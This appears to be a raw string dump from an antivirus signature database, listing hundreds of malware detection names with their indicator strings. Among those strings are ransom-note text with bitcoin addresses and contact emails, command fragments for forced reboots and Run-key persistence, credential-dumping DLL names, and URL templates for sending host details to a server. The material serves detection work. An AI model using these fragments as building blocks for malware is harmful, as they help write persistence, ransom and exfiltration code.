C:\\Server\\BotUI\\App_Data\\Temp\\ \\src\\ !#HSTR:VirTool:Win32/Obfuscator!Diplugem.F !#SLF:Win32/VmAllocCall.A !#HSTR:BlackEnergy.KLA1 !#HSTR:PossibleDownloader.A dropbox.com noip.com aAB0AHQAcAA6AC8ALwB 4shared.com/download/ 4shared.com/download/x !#ALF:HSTR:VirTool:Win32/Injector.S06 !#ALF:Trojan:Win32/Seraph.SIB!MTB !#ALFPER:HSTR:Silcon.AZ1 !#HSTR1:Trojan:Win32/BHO.AB !#BM_AT_cry:DefenderControl Windows Defender Control sordum.org All By BlueLifex !#HSTR:AVGVulnExeFragments.A 6d830c6784a809058c0de941b1e688b6 AVG Technologies CZ, s.r.o. !#HSTR:MSIL/Obfuscator.Deepsea.D !#ALF:HSTR:Trojan:Win32/StartPage.ZZ!bit http://imp.mymapsxp.com/ \\Release\\IEUninstall.pdb SetHomepage SetHomepageToSpecifiedURL SetHomepageSetHomepageToSpecifiedURLx !#ALF:Ransom:Win64/Conti.ZC !#Adware:Win32/GamePlayLabs GamePlayLabsBHO GamePlayLabs Plugin Ivan\\Documents\\generic_exe\\Release\\BHO.pdb Ivan\\Documents\\generic_exe\\Release\\BHO.pdbx !#HSTR:ExamSoft Examsoft.Data.Common http://stwinwebservices.examsoft.com/ ExamSoft.Globals ExamSoft.Globalsx !#HSTR:HackTool:MSIL/skymadz Skype Tool\\obj\\Debug\\AstroHgamers Skype Tool.pdb MacaulyMoDz AstroHDGammers_Skype_Tool AstroHDGammers_Skype_Toolx !#ALF:HSTR:DDoS:MSIL/TKCode.A!bit \\Release\\TKCodeDDoS.pdb TKCodeDDoS.exe get_IP set_IP get_IPset_IPsIP \"http://tkcode.xyzx !#Adware:Win32/Wingo LogProc.php? mac=<MAC-ADDR> &pCode=<P-CODE> searchurl clicklogurl winggo.co.kr winggo !#TEL:HackTool:Win32/Creddump!dha creddump.dll DumpCF LsaICryptUnprotectData L$(VV L$4VV L$@SW !#PUA:Block:CoinMiner!ETH --farm-recheck --cuda-block-size --mining-threads http://127.0.0.1:8545 Usage ethminer [OPTIONS] Usage ethminer [OPTIONS]x !#TEL:Ransom:Win32/Cryptomix.KA C:\\WINDOWS\\twein__32.dll dfhdrt8rt$#%YgsadFsde C shutdown.exe -r -t 00 C:\\i.txt %s\\123.bat %s\\123.batx !#ALF:Ransom:MSIL/FileCryptor.AC!MTB Destruction System RECOVERY INSTRUCTIONS .destroyed EncryptBytes get_TargetFiles get_TargetFilesx !#HSTR:VirTool:Win32/DelfInject.gen!AO ZwUnmapViewOfSection FindExecutableA Activespyx !#ALF:Trojan:Win32/Plotsy.A!dha VParseTheFileAndLoad@@ MemoryLoadDll ,ShowMain netutils32.dll %s%08X.dll !#HSTR:Trojan:MSIL/AgentTesla.OXGA!MTB L !#HSTR:Trojan:MSIL/AgentTesla.OXEC!MTB > IDM.IUelpmiS StrReversex StrReversexx !#ALF:Trojan:MSIL/AgentTesla.ADF!MTB G !#ALF:TrojanDownloader:Win32/Satacom.A!MTB ollydbg.exe }id=28 GetTempPathA GetTempPathAx !#ALF:Trojan:Win32/FrontShell.A!dha h|?BTV !#HSTR:Nivdort.CV1 !#TEL:TrojanDownloader:Win32/Phorpiex.D !#ALF:HSTR:Rogue:Win32/PCPurifier.S01 http://www.pcpurifier.com/buynow/? http://www.pcpurifier.com/renewal/? Software\\PC Purifier Software\\PC Purifierx !#HSTR:Kilaservos.B2 J9ygvqP8fStj8ewk NQVLvszyLBDWnow4gw== NQVJAUxjqMRAygG5yQ== FTnBcB7Imt5hZi9y etRI1g== esX6ew== esX6ew==x !#TEL:HackTool:Win32/GDad_Sclm_hstr.A!dha Software\\Microsoft\\Internet Explorerx !#TEL:Ransom:Win32/MorrisBatchCrypt.Lowfi!MTB Your files is encrypted with aes and rsa help to decrypt.html info@morris2uk.com info@morris2uk.comx !#TEL:Trojan:Win32/Depriz.F!dha shutdown -r -f -t 2 \\inf\\ type= kernel start= demand binpath= System32\\Drivers\\ type= kernel start= demand binpath= System32\\Drivers\\x !#HSTR:TrojanDownloader:Win32/Banload.ADZ cmd /k c:\\ KL1.exe cmd /k c:\\Compac !#HSTR:Trojan:Win32/Vundo.IB!dll !#ALF:Trojan:Win32/Ursnif.VN!MTB DVERI FADO, TOV admin@dverifadotov.space Bud. 115 prospekt Gagarina Dnipropetrovsk Oblast Dnipropetrovsk Oblastx !#ALF:Trojan:Win64/HookPwd.AA!MTB HookPasswordChange.dll PasswordChangeNotify InitHooking Hook-PasswordChangeNotify-master Hook-PasswordChangeNotify-masterx !#HSTR:DDoS:Win32/Nitol.B2 5.scr 5.sc_ IXP%03d.TMP TMP4351$.TMP %sadvpack.dll,DelNodeRunDLL32 Command.com !#ALF:Backdoor:Win64/Proflag.A!dha Win%d.%d.%d Not implemented! CMD Error! CMD Error!x !#ALFPER:HSTR:Nivdort.ED!Sleep !#HSTR:B !#AGGR:TrojanDownloader:O97M/Donoff.gen!A e)8!#AGGR:TrojanDownloader:O97M/Donoff.gen!A !#ALF:TrojanDownloader:O97M/Encdoc.ZPE!MTB e*7!#ALF:TrojanDownloader:O97M/Encdoc.ZPE!MTB !#TEL:AGGR:CtxSvcHstDrop:winhttpautoproxysvc e,5!#TEL:AGGR:CtxSvcHstDrop:winhttpautoproxysvc e-4!#BLKACC:d4f940ab-401b-4efc-aadc-ad5f3c50688a !#AGGR:MonitoringBehaviorAsServiceInstalled_FileRemoved e7*!#AGGR:MonitoringBehaviorAsServiceInstalled_FileRemoved !#AGG:Nivdort.CU1 Q!#AGG:Nivdort.CU1 O!#do_vmmgrow_rescan !#ALF:Aggr:PossibleVeil.A I!#ALF:Aggr:PossibleVeil.A !#AGGR:Worm:Win32/Copali.C H!#AGGR:Worm:Win32/Copali.C G!#AllowList:Aggr/Fuerboos.A !#Backdoor:PHP/Webshell.RFNg G!#Backdoor:PHP/Webshell.RFNg !#AGGR:Exploit:HTML/Tweight!dha C!#AGGR:Exploit:HTML/Tweight!dha !#TrojanDownloader:Win32/Beebone f B!#TrojanDownloader:Win32/Beebone !#ALF:AGGR:Phish:HTML/Mitargcro.S10 f#?!#ALF:AGGR:Phish:HTML/Mitargcro.S10 !#ALF:Trojan:MSIL/AgentTesla.JK!MTB f#?!#ALF:Trojan:MSIL/AgentTesla.JK!MTB !#ALF:Trojan:Win32/Predator.SSM!MTB f#?!#ALF:Trojan:Win32/Predator.SSM!MTB !#TEL:Trojan:Script/Coinminer.C!MSR f#?!#TEL:Trojan:Script/Coinminer.C!MSR !#AGGR:HSTR:MSIL/PossibleKeylogger.E f$>!#AGGR:HSTR:MSIL/PossibleKeylogger.E !#AGGR:HSTR:MSIL/PossibleKeylogger.H f$>!#AGGR:HSTR:MSIL/PossibleKeylogger.H !#ALF:AGGR:O97M/CVE-2017-11882.AT!gen f%=!#ALF:AGGR:O97M/CVE-2017-11882.AT!gen !#ALF:Exploit:Script/Cauldroner.B!dha f%=!#ALF:Exploit:Script/Cauldroner.B!dha !#do_exhaustivehstr_rescan_nivdort_ce1 f&<!#do_exhaustivehstr_rescan_nivdort_ce1 !#do_exhaustivehstr_rescan_nivdort_co1 f&<!#do_exhaustivehstr_rescan_nivdort_co1 !#ALF:Trojan:O97M/OfficeWmiRunCscript.B f';!#ALF:Trojan:O97M/OfficeWmiRunCscript.B !#ALF:Trojan:O97M/OfficeWmiRunWscript.B f';!#ALF:Trojan:O97M/OfficeWmiRunWscript.B !#ALF:Trojan:Win32/Cassini_532ea7d7!ibt f';!#ALF:Trojan:Win32/Cassini_532ea7d7!ibt !#ALF:Trojan:Win32/Cassini_c0485653!ibt f';!#ALF:Trojan:Win32/Cassini_c0485653!ibt !#ALF:TrojanSpy:Perl/Droppedpulse.A!dha f';!#ALF:TrojanSpy:Perl/Droppedpulse.A!dha !#SLF:Trojan:PowerShell/IntuneMDM.B!MTB f';!#SLF:Trojan:PowerShell/IntuneMDM.B!MTB !#ALF:Exploit:HTML/UsingIE8JScript.A!dha f(:!#ALF:Exploit:HTML/UsingIE8JScript.A!dha !#TEL:TrojanDownloader:O97M/EncDoc.SAW!MTB f*8!#TEL:TrojanDownloader:O97M/EncDoc.SAW!MTB !#AGGREGATOR:REG/DisallowedCert_Malwarebytes f,6!#AGGREGATOR:REG/DisallowedCert_Malwarebytes !#ALF:Exploit:Script/GeneralityB.Browser!dha f,6!#ALF:Exploit:Script/GeneralityB.Browser!dha !#SLF:Context/SuspExeFileDropBySystemProc.C!sysdir f20!#SLF:Context/SuspExeFileDropBySystemProc.C!sysdir !#BM_CC_WEBSHELL S!#BM_CC_WEBSHELL S!#do_deep_rescan !#AGGR:PSFileDisc R!#AGGR:PSFileDisc !#AGG:Nivdort.EMZ1 Q!#AGG:Nivdort.EMZ1 !#AGGR:ExcelMacroChk O!#AGGR:ExcelMacroChk !#ALF:AGGR:EmbeddedPS!geng J!#ALF:AGGR:EmbeddedPS!geng !#SLF:Win32/Amsipreload.A J!#SLF:Win32/Amsipreload.A !#SLF:MasqSysinternalUtil.B H!#SLF:MasqSysinternalUtil.B !#TEL:Trojan:AutoIt/Agova.A H!#TEL:Trojan:AutoIt/Agova.A !#LowfiTrojan:JS/Seedabutor.B F!#LowfiTrojan:JS/Seedabutor.B !#LowfiTrojan:JS/Seedabutor.C F!#LowfiTrojan:JS/Seedabutor.C !#TEL:Trojan:Win32/ObfDldr.C!lnk g C!#TEL:Trojan:Win32/ObfDldr.C!lnk !#TEL:Trojan:Win32/Predator.SSMT!MTB g$?!#TEL:Trojan:Win32/Predator.SSMT!MTB !#ALF:Trojan:PowerShell/Pattuko.A!MTB g%>!#ALF:Trojan:PowerShell/Pattuko.A!MTB !#ALF:Trojan:Win32/Cassini_29ec13c4!ibt g'<!#ALF:Trojan:Win32/Cassini_29ec13c4!ibt !#ALF:Trojan:Win32/Cassini_2e24da37!ibt g'<!#ALF:Trojan:Win32/Cassini_2e24da37!ibt !#ALF:Trojan:Win32/Cassini_2f77e9f3!ibt g'<!#ALF:Trojan:Win32/Cassini_2f77e9f3!ibt !#SLF:CmdSingleFileInsideArchive.B!7zip g'<!#SLF:CmdSingleFileInsideArchive.B!7zip !#SLF:JseSingleFileInsideArchive.B!7zip g'<!#SLF:JseSingleFileInsideArchive.B!7zip !#SLF:VbeSingleFileInsideArchive.B!7zip g'<!#SLF:VbeSingleFileInsideArchive.B!7zip !#SLF:VbsSingleFileInsideArchive.B!7zip g'<!#SLF:VbsSingleFileInsideArchive.B!7zip !#ALF:Backdoor:PowerShell/Powerella.A!dha g):!#ALF:Backdoor:PowerShell/Powerella.A!dha !#SLF:HackTool:PowerShell/Internalon.F!MTB g*9!#SLF:HackTool:PowerShell/Internalon.F!MTB !#TEL:TrojanDownloader:O97M/EncDoc.RTE!MTB g*9!#TEL:TrojanDownloader:O97M/EncDoc.RTE!MTB !#ALF:Trojan:Powershell/TrickySpeller.B!dha g+8!#ALF:Trojan:Powershell/TrickySpeller.B!dha !#TEL:AGGR:CtxSvcHstDrop:audioendpointbuilder g-6!#TEL:AGGR:CtxSvcHstDrop:audioendpointbuilder !#AGG:Nivdort.AG1 S!#AGG:Nivdort.AG1 !#AGGR:ExcelSiorType.A N!#AGGR:ExcelSiorType.A !#AGGR:SusPeHasIOAVUrl.A1 K!#AGGR:SusPeHasIOAVUrl.A1 !#AGGR:Tionas_Inception!dllg I!#AGGR:Tionas_Inception!dllg !#ALF:Trojan:JS/Obfuse.SM!MTB G!#ALF:Trojan:JS/Obfuse.SM!MTB !#AllowList:YaraRules.KSH!MSR G!#AllowList:YaraRules.KSH!MSR !#Trojan:Win32/SpyNoon.RR!MTB G!#Trojan:Win32/SpyNoon.RR!MTB !#ALF:Phish:PHP/PhishTnRKit.A!MTB h!C!#ALF:Phish:PHP/PhishTnRKit.A!MTB !#TEL:O97M/CVE-2017-11882.AAR!eml h!C!#TEL:O97M/CVE-2017-11882.AAR!eml !#AllowList:Program:Win32/OpenCandy h#A!#AllowList:Program:Win32/OpenCandy !#SLF:Trojan:PowerShell/Drivzo.B!MTB h$@!#SLF:Trojan:PowerShell/Drivzo.B!MTB !#AGGR:HSTR:Win32/PossibleKeylogger.A h%?!#AGGR:HSTR:Win32/PossibleKeylogger.A !#AGGR:HSTR:Win32/PossibleKeylogger.B h%?!#AGGR:HSTR:Win32/PossibleKeylogger.B !#AGGR:HSTR:Win32/PossibleKeylogger.C h%?!#AGGR:HSTR:Win32/PossibleKeylogger.C !#ALF:LowFi:Trojan:Win32/Embexe.A!gen h%?!#ALF:LowFi:Trojan:Win32/Embexe.A!gen !#ALF:TrojanDownloader:Java/Banload.H h%?!#ALF:TrojanDownloader:Java/Banload.H !#ALF:LuaSuspiciousFileNamePeExChild.D h&>!#ALF:LuaSuspiciousFileNamePeExChild.D !#SLF:CmdSingleFileInsideArchive.B!rar h&>!#SLF:CmdSingleFileInsideArchive.B!rar !#SLF:JseSingleFileInsideArchive.B!rar h&>!#SLF:JseSingleFileInsideArchive.B!rar !#SLF:JseSingleFileInsideArchive.B!zip h&>!#SLF:JseSingleFileInsideArchive.B!zip !#SLF:VbeSingleFileInsideArchive.B!rar h&>!#SLF:VbeSingleFileInsideArchive.B!rar !#SLF:VbeSingleFileInsideArchive.B!zip h&>!#SLF:VbeSingleFileInsideArchive.B!zip !#SLF:VbsSingleFileInsideArchive.B!rar h&>!#SLF:VbsSingleFileInsideArchive.B!rar !#SLF:VbsSingleFileInsideArchive.B!zip h&>!#SLF:VbsSingleFileInsideArchive.B!zip !#ALF:Trojan:Win32/Cassini_2f93808e!ibt h'=!#ALF:Trojan:Win32/Cassini_2f93808e!ibt !#ALF:Trojan:Win32/Cassini_589b8a08!ibt h'=!#ALF:Trojan:Win32/Cassini_589b8a08!ibt !#BM_SCHEDULEDTASKJOB_NETWORKSERVICEPRIV h(<!#BM_SCHEDULEDTASKJOB_NETWORKSERVICEPRIV !#ALF:TrojanDownloader:O97M/EncDoc.XA!MTB h);!#ALF:TrojanDownloader:O97M/EncDoc.XA!MTB !#ALF:TrojanDownloader:O97M/Obfuse.PRV!MTB h*:!#ALF:TrojanDownloader:O97M/Obfuse.PRV!MTB !#ALF:TrojanDownloader:O97M/ObfBook.JKC!MTB h+9!#ALF:TrojanDownloader:O97M/ObfBook.JKC!MTB !#ALF:TrojanDownloader:O97M/ObfBook.JKD!MTB h+9!#ALF:TrojanDownloader:O97M/ObfBook.JKD!MTB !#ALF:TrojanDownloader:O97M/ObfBook.JKE!MTB h+9!#ALF:TrojanDownloader:O97M/ObfBook.JKE!MTB !#ALF:TrojanDownloader:O97M/ObfBook.JKF!MTB h+9!#ALF:TrojanDownloader:O97M/ObfBook.JKF!MTB !#SLF:HackTool:PowerShell/Internaloff.A!MTB h+9!#SLF:HackTool:PowerShell/Internaloff.A!MTB !#ALF:Exploit:JS/FindMsvcrtWithJscript.A!dha h,8!#ALF:Exploit:JS/FindMsvcrtWithJscript.A!dha !#AGGREGATOR:MetasploitWinRMScriptExecPayload!shell h31!#AGGREGATOR:MetasploitWinRMScriptExecPayload!shell !#AGG:Nivdort.JUMP S!#AGG:Nivdort.JUMP !#TEL:ExxrouteNote S!#TEL:ExxrouteNote !#//EncryptedAttachment N!#//EncryptedAttachment !#SLF:LNK/SuspExeE.JT!ibt L!#SLF:LNK/SuspExeE.JT!ibt !#SLF:Win32/Winbiopreload.A J!#SLF:Win32/Winbiopreload.A !#AAGGREGATOR:vbscript_in_fasg H!#AAGGREGATOR:vbscript_in_fasg H!#Trojan:Win32/SpyNoon.RR!MTB !#ALF:Backdoor:ASP/Dirtelti.VV G!#ALF:Backdoor:ASP/Dirtelti.VV !#ALF:Trojan:O97M/DmlEmo.SD!MTB F!#ALF:Trojan:O97M/DmlEmo.SD!MTB !#ALF:AGGR:O97M/Ole10Native.A!gen i!D!#ALF:AGGR:O97M/Ole10Native.A!gen !#SCRIPT:Worm:JS/Proslikefan.gen!1 i\"C!#SCRIPT:Worm:JS/Proslikefan.gen!1 !#SCRIPT:Worm:JS/Proslikefan.gen!2 i\"C!#SCRIPT:Worm:JS/Proslikefan.gen!2 !#ALF:Exploit:Script/Sundoggle.L!dha i$A!#ALF:Exploit:Script/Sundoggle.L!dha !#ALF:Phish:PHP/PhishPageXodni.B!MTB i$A!#ALF:Phish:PHP/PhishPageXodni.B!MTB !#TEL:TrojanDownloader:O97M/Toredic2 i$A!#TEL:TrojanDownloader:O97M/Toredic2 !#ALF:Trojan:Win32/Cassini_44c148fc!ibt i'>!#ALF:Trojan:Win32/Cassini_44c148fc!ibt !#ALF:Trojan:Win32/Cassini_5e421948!ibt i'>!#ALF:Trojan:Win32/Cassini_5e421948!ibt !#ALF:Trojan:Win32/Cassini_de6066a7!ibt i'>!#ALF:Trojan:Win32/Cassini_de6066a7!ibt !#TEL:Trojan:O97M/OfficeWmiRunProcess.A i'>!#TEL:Trojan:O97M/OfficeWmiRunProcess.A !#SLF:Trojan:PowerShell/ProzyUtilz.B!MTB i(=!#SLF:Trojan:PowerShell/ProzyUtilz.B!MTB !#TEL:Exploit:O97M/PostScriptExp.gen!dha i(=!#TEL:Exploit:O97M/PostScriptExp.gen!dha J3J3J3J3 !#ALF:TrojanDownloader:O97M/DdeExec.DD!MTB i*;!#ALF:TrojanDownloader:O97M/DdeExec.DD!MTB !#ALF:TrojanDownloader:O97M/Obfuse.PVD!MTB i*;!#ALF:TrojanDownloader:O97M/Obfuse.PVD!MTB !#TEL:Trojan:MSIL/IronGateDllInstaller.A!dha i,9!#TEL:Trojan:MSIL/IronGateDllInstaller.A!dha !#TEL:AGGR:CtxSvcHstDrop:localservicenonetwork i.7!#TEL:AGGR:CtxSvcHstDrop:localservicenonetwork i32!#AGGREGATOR:MetasploitWinRMScriptExecPayload!shell !#//Html_file j Y!#//Html_file !#ALF:MamacseMacro.D R!#ALF:MamacseMacro.D !#BM_curl_as_svchost R!#BM_curl_as_svchost !#AGGR:PossibleBanload P!#AGGR:PossibleBanload N!#AGGR:ClnAmsiDllWriters !#SLF:Win32/Amsipreload.B M!#SLF:Win32/Amsipreload.B !#TEL:PowerShell/Rigoil!ps L!#TEL:PowerShell/Rigoil!ps !#ALF:PowerShell/Fulcrum.A!MTB H!#ALF:PowerShell/Fulcrum.A!MTB !#SLF:MsiFileWithJarFile.gen!A H!#SLF:MsiFileWithJarFile.gen!A !#Retired:TrojanAgentBypassGenD G!#Retired:TrojanAgentBypassGenD !#ALF:Trojan:Win32/Deyma.ARA!eml j F!#ALF:Trojan:Win32/Deyma.ARA!eml !#SCPT:JS/Obfuscator.Juxtaposed.E j!E!#SCPT:JS/Obfuscator.Juxtaposed.E !#AGGR:Win32/Banloadkercos.B!Lowfi j\"D!#AGGR:Win32/Banloadkercos.B!Lowfi !#SLF:Exploit:CVE-2021-28480.D!gen j\"D!#SLF:Exploit:CVE-2021-28480.D!gen !#ALF:Trojan:Win32/Cassini_15ec9c0e!ibt j'?!#ALF:Trojan:Win32/Cassini_15ec9c0e!ibt !#ALF:Trojan:Win32/Cassini_c8141ec6!ibt j'?!#ALF:Trojan:Win32/Cassini_c8141ec6!ibt !#ALF:Trojan:Win32/Cassini_cdc3354b!ibt j'?!#ALF:Trojan:Win32/Cassini_cdc3354b!ibt !#TrojanDownloader:Script/AHCoinMiner.H1 j(>!#TrojanDownloader:Script/AHCoinMiner.H1 !#TrojanDownloader:Script/AHCoinMiner.H2 j(>!#TrojanDownloader:Script/AHCoinMiner.H2 !#TrojanDownloader:Script/AHCoinMiner.H3 j(>!#TrojanDownloader:Script/AHCoinMiner.H3 !#TEL:TrojanDownloader:HTML/ADRecon.A!MTB j)=!#TEL:TrojanDownloader:HTML/ADRecon.A!MTB !#ALF:TrojanDownloader:O97M/EncDoc.PXB!MTB j*<!#ALF:TrojanDownloader:O97M/EncDoc.PXB!MTB !#SLF:HackTool:PowerShell/Internalon.E!MTB j*<!#SLF:HackTool:PowerShell/Internalon.E!MTB !#ALF:Exploit:JS/DecodeEvalAndSessionId.A!dha j-9!#ALF:Exploit:JS/DecodeEvalAndSessionId.A!dha !#TEL:PowerShell/CriticalFileCollection.C!ams j-9!#TEL:PowerShell/CriticalFileCollection.C!ams !#TEL:PowerShell/CriticalFileCollection.D!ams j-9!#TEL:PowerShell/CriticalFileCollection.D!ams !#ALF:Exploit:Script/GeneralityB.Embedded.Script j06!#ALF:Exploit:Script/GeneralityB.Embedded.Script !#TEL:Win32/LnkFileWithPowershellGetContentIEX.B j06!#TEL:Win32/LnkFileWithPowershellGetContentIEX.B !#AGG:UnsignedNSIS U!#AGG:UnsignedNSIS !#AGGR:badJSobfusInZip Q!#AGGR:badJSobfusInZip &Imaginer.malheureux CarParking.CarDetails.resources CarParking.frmCarInventory.resources CarParking.Load.resources CarParking.MainSystem.resources CarParking.Resources.resources CarParking.ParkingSlots.resources CarParking.Services.resources CarParking.Sign_Up.resources CarParking.ViewOperations.resources CarParking.ViewVehicels.resources F.g.resources RALL VEHICLES ARE PARKED AT OWNERS RISK!!!x !#ALF:Trojan:Win32/Zloader.RW!MTB 7 c:\\1\\rich\\look\\80\\24\\Famous\\35\\72\\special\\22\\melody.pdb 0 c:\\stayWide\\softthey\\markethorse\\bothside\\of.pdb V d:\\74\\55\\Child\\Require\\bank\\Bear\\rather\\66\\Boy\\front\\special\\straight\\wood\\1\\guide.pdb Client hook allocation failure ITERATOR LIST CORRUPTED anonymous namespace GetSystemInfo GetCPInfo GetStartupInfoW Orphan_me BrC:\\Cryptor\\CryptorDLL\\bin\\json.hx !#ALF:HSTR:TrojanDropper:Win32/Woozlist.D!bit nidieshiwola. \\temp\\temp.chk Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewOnDrive !#TrojanSpy:Win32/Bancos.gen!K_3 b*r*a b*r@a b*r#a b*r%a b@r@a b@r*a b@r#a b@r%a b#r#a b#r*a b#r@a b#r%a b%r%a b%r*a b%r@a b%r#a !#TrojanSpy:Win32/Bancos.gen!K_a /@i@n /@i#n /@i%n /@i*n /#i@n /#i#n /#i%n /#i*n /%i@n /%i#n /%i%n /%i*n /*i@n /*i#n /*i%n /*i*n !#HSTR:Trojan:Win32/FormBook.AMP3!MTB kernel32::ReadFile(i r , i r .DEFAULT\\Control Panel\\International Control Panel\\Desktop\\ResourceLocale Microsoft\\Internet Explorer\\Quick Launch UnimplementedAPI !#HSTR:Trojan:Win32/FormBook.AMP4!MTB !#ALFPER:TrojanProxy:MSIL/Exton.A!dha Channeling.dll Tunnel Channeling <Module>Channeling.dllTunnelChanneling TunnelNetStream_ TunnelSocket_ TunnelCrypt_ TunnelPortReconnect CreateMainConnection DoAuthentication GetPortReconnect ReadFromTunnel WriteInTunnel ReadFromSession CheckDataFromTunnel WriteDatatoRemoteServer MsgFromClientSessions SetWorkKey NUM_KEYS NUM_PASSWD KEYS_LEN PASSWD_LEN NUM_KEYSNUM_PASSWDKEYS_LENPASSWD_LEN current_key baseKeys basePasswords current_keybaseKeysbasePasswordsStart GetPasswords cryptRC4 GetKeyGetPasswordscryptRC4 How are you?x !#TEL:Exploit:Win64/UsoDllLoader.A!dha UsoCoreWorkerRunning UsoCoreWorker.pdb onecore\\enduser\\ UsoApi.pdb MusNotifyIcon WindowsUpdateElevatedInstaller 6\\WindowsUpdate\\Orchestrator DeviceCensus.pdb ApplyUpdate.pdb InputLocaleManager onecoreuap\\shell\\ LangUpdateLauncher \\Speech_OneCore\\ \\WindowsUpdate\\ VSGraphicsCaptureEngine VSGraphicsCaptureEnginex !#ALF:TrojanDownloader:Win32/Small.SIBA!MTB !#ALF:TrojanDownloader:Win32/Small.SIBA!MTBd6 /dt/dt.txt /dt/log.asp RemoteAccess %s?isnew= &LocalInfo=%s&szHostName=%s&tmp AeliFoTdaolnwoDLRU AlrUnepOtenretnI AnepOtenretnI lld.nomlru lld.teniniW lld.teniniWx !#Lowfi:HackTool:Win32/CCProxy CCProxy5User already exists or User/IP/MAC length is illegal! About CCProxy...QUser Name|IP Address|MAC Address|Connections|Bandwidth|Enable|Group|Belongs Group Address|MAC Address|User/Password|User/Password Report Files (*.htm)|*.htm|All Files (*.*)|*.*|| changeadminpassword !#ALF:Ransom:Win32/Lokbitty.A 1PFkYtDbxQRTv8Xse77u7wYG5bht8QB6e2 18jAZHhC8uy13n2Ym7YTTmTBfr9r8tivDM sociopatii@yahoo.com cage1@gmx.us I would like to tell you first I'm sorry about that. Your documents, files, databased most are in original places or some moved to your local data. If you want to regain access to your local disk, all your files, documents, etc please send It's just business not trying to get your money and then to not give to you the bitlocker password. Waiting for your reply to my email address It's just business not trying to get your money and then to not give to you the bitlocker password. Waiting for your reply to my email addressx Library.Main_fm.resources Library.AuthorizationForm.resources Library.add_book_fm.resources Library.add_users_fm.resources Library.add_issue_fm.resources Library.issued_fm.resources Library.ChangeUserDataForm.resources Library.Properties.Resources.resources SetWindowsHookEx Data Source=|DataDirectory|\\Database1.sdf set_HideSelection set_PasswordChar set_HideSelectionset_PasswordChar ToStringConcat Assembly AssemblyLoadGetType getInstance logged LoggedChange getInstanceloggedLoggedChangex! !#SoftwareBundler:MSIL/Protlerdob tela_inicial navegador_ barra_progresso lb_carregando lb_porc painel_inicial USERPROFILE \\Desktop\\ /VERYSILENT /NORESTART \tTEMP /conta.url Prime.url .google.com dply.exe \\Users\\FELIPE\\Desktop\\downloader !#HSTR:TrojanDropper:Win32/Tracur.gen!M \t!#HSTR:TrojanDropper:Win32/Tracur.gen!M !#TEL:Trojan:Win32/AgentTesla.SSMB!MTB m_Opciones ControlSystemLibrary.Opciones.resources ControlSystemLibrary.CustomText.resources ControlSystemLibrary.AGVDisplay.resources ControlSystemLibrary.PartSingleDisplay.resources ControlSystemLibrary.BatteryDisplay.resources ControlSystemLibrary.Zodiac.resources ControlSystemLibrary.PartDisplayControl.resources setDataBinding ControlSystemLibrary.Resources.resources ControlSystemLibrary.Resources.resourcesx# !#HSTR:Yesudac.A2 6C9C3C9D33A52BBD CE21A020B526AB3C 2E5EFF4194C40858 9FD173D20656FB6C 86F656F76DFF4597 7FF153F266F65A8A 88F858F96FE167F9 96C32858AAE97286E8 6EFB6090E22048BC21 EE7AFE718582EA0165 4792D6295DBA255B9F 4693D92A5CBB24589A 28B53A4ABCDB0478FA 4895DB2C5EBD265A9C CF1D4181D67AC013B42BB635AF22A524A627BC006DF56EED63E36AEC788A31923 44B816469937ADC82F41 EC034090C3015792D629 DA2FA63D91CD13B32EA2205CF06FE077D87DD40F4E B92ABF0759F853B7D836AB29A4 B92ABF0759F853B7D836AB29A4x$ !#ALFPER:Trojan:Win64/NewPass.X!dha Comment Microsoft Windows Co Assembly !#HSTR:Trojan:Win32/Busky.EL buildid createdir curver getbrowser getcompid getname getsysdir getwm ismodem loadvar openexe regdelkey regdelval reggetval regnewkey regsetval saveexe savevar selfupdate setscript settitle setwindowposx& !#ALFPER:TrojanDownloader:Win32/VaporRage.D!dha !#TEL:Trojan:Win32/BazarLoader.M!ibt \\natchat-master\\x64\\Release\\natchat.pdb \\seriallogger-master\\Src\\Service\\SerialMon___Win32_MCD_Release\\SerialLogger.pdb \\JECOMS\\x64\\Release\\JECOMS.pdb \\seriallogger-master\\Src\\Config\\SMConfig___Win32_MCD_Release\\SerialLoggerConfig.pdb \\Release\\WIFI.pdb \\administration\\spy\\x64\\Release\\ComSpy.pdb \\tutorial\\Release\\CoffeeShop6.pdb \\tutorial\\x64\\Release\\CoffeeShop6.pdb \\SEED\\Release\\SEED.pdb \\gridctrl_demo227\\Release\\GridCtrlDemo.pdb \\Loader\\Release\\Loader.pdb \\Loader\\Release\\Loader.pdbx& !#HSTR:Trojan:Win32/FormBook.AMP2!MTB kernel32::VirtualProtect(i r kernel32::GetCurrentProcess()i.r lOwqlOw ShellExecuteAx( !#TEL:TrojanDropper:Win32/Kerfuffle.A!dha \t!#TEL:TrojanDropper:Win32/Kerfuffle.A!dha cmd.exe /c InfDefaultInstall.exe rundll32.exe advpack.dll,LaunchINFSectionEx explorer /e, /select, cmd.exe /c echo HKCU,\"Software\\Microsoft\\Windows\\CurrentVersion\\Run \\ScnCfg.exe \\vsodscpl.dll MyselfLotPH_miansha rbAdmin_CheckedChanged_1 rbDoctor_CheckedChanged_1 rbReceptionist_CheckedChanged_1 remove_PatientRowChanged TimeZoneInfoComparer SWE2_Project1.Login.resources SWE2_Project1.Admin.resources SWE2_Project1.Doctor.resources SWE2_Project1.Properties.Resources.resources SWE2_Project1.Receptionist.resources SWE2_Project1.DBDataSetTableAdapters SWE2_Project1.Properties.Resources sssss get_ssss .exes !#ALF:PWS:Win32/Zbot.A outpost.exe __SYSTEM__ 0\\currentversion\\explorer 0\\currentversion\\winlogon 2nt\\currentversion\\network upcfg %s %sData: %s URL: %s !application/x-www-form-urlencoded Content-Type: binary Mozilla/4.0 (compatible; MSIE 6.0; \"Mozilla/4.0 (compatible; MSIE 6.0; ftp://%s:%s@%u.%u.%u.%u %u.%u.%u.%u:%u anonymous .%uanonymous PS data: DisconnectNamedPipe DisconnectNamedPipex) !#HSTR:Win32/Tnega.R!MTB $MsiLogFileLocation RunAsAdminFile RunAsAdminCmd (RunAsAdminWorkingDir [StartupFolder] H[LocalAppDataFolder]Programs\\Common\\ AICustAct.dll DeleteShortcuts SHGetSpecialFolderPathW SHGetSpecialFolderLocation SHGetMalloc ExpandEnvironmentStringsW OpenMutexW OpenMutexWx* 